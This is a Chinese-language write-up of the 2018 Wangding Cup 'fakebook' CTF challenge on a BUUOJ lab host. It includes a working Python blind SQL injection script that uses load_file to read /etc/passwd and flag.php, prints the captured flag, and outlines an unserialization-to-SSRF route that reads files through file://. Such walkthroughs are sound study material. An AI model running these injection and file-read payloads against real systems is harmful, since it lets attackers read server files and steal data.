[网鼎杯2018]fakebook题解

首先注册一个账号，注意blog是一个http或https的链接的形式，否则将无法通过。

点击用户名进入用户界面，根据页面内容，初步怀疑本题考查SSRF。不过由于不能使用file等协议，感觉应该需要在某处进行绕过。

用户界面的url为http://812a2fb3-abaa-4b68-98b4-2bc2172d4509.node3.buuoj.cn/view.php?no=1，输入单引号发现报错。

[*] query error! (You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1)
Fatal error: Call to a member function fetch_assoc() on boolean in /var/www/html/db.php on line 66

经过测试发现该页面做了一些过滤，但load_file没有被过滤，/etc/passwd文件可以读取到。接下来测试到flag的位置位于/var/www/html/flag.php。

下面写了一个脚本来获取flag.php中的内容。

import requests
def exp(url_format,length=None):
    rlt = ''
    url  = url_format
    if length==None:
        length = 50
    for l in range(1,length+1):
        begin = 1
        ends = 126
        tmp = (begin+ends)//2
        while begin<ends:
            r = requests.get(url.format(l,tmp))
            #判断条件根据情况修改
            if b'http://www.baidu.com' in r.content:
                begin = tmp+1
                tmp = (begin+ends)//2 
            else:
                ends = tmp
                tmp = (begin+ends)//2
        rlt+=chr(tmp)
        print(rlt)
    return rlt.rstrip()
url = "http://812a2fb3-abaa-4b68-98b4-2bc2172d4509.node3.buuoj.cn/view.php?no=elt(ord(substr(load_file(%27/var/www/html/flag.php%27),{},1))%3E{},1)"
exp(url,400)

其中核心的payload为

elt(ord(substr(load_file('/var/www/html/flag.php'),?,1))>?,1)

静静地等待几分钟得到了结果

<?php
$flag = "flag{98207bdb-3d8f-43df-9956-2211c9fa9b05}";
exit(0);

好像有什么不对，说好的SSRF呢？？？通过查看他人的题解，发现这个不是预期解，预期解是通过反序列化进行SSRF。接下来说说预期解怎么做。

首先是发现了robots.txt中泄漏了/user.php.bak这个文件。

该文件主要是生命了一个用户类，当调用get方法时会访问某个url得到信息，如果该url被恶意利用，比如利用file协议，就可以读取任意文件。

<?php
class UserInfo
{
    public $name = "";
    public $age = 0;
    public $blog = "";

    public function __construct($name, $age, $blog)
    {
        $this->name = $name;
        $this->age = (int)$age;
        $this->blog = $blog;
    }

    function get($url)
    {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        $output = curl_exec($ch);
        $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        if($httpCode == 404) {
            return 404;
        }
        curl_close($ch);
        return $output;
    }
    public function getBlogContents ()
    {
        return $this->get($this->blog);
    }
    public function isValidBlog ()
    {
        $blog = $this->blog;
        return preg_match("/^(((http(s?))://)?)([0-9a-zA-Z-]+.)+[a-zA-Z]{2,6}(:[0-9]+)?(/S*)?$/i", $blog);
    }
}

接着在刚才的注入点，可以发现data字段

data: O:8:"UserInfo":3:{s:4:"name";s:5:"admin";s:3:"age";i:12;s:4:"blog";s:20:"http://www.baidu.com";}

也就意味着view.php将查询到的结果进行了反序列化。所以可以在查询的时候构造一个反序列化字符串，将blog字段修改为file:///var/www/html/flag.php即可。

关于具体的payload，大家可以参考其他文章，预期解网上多的是。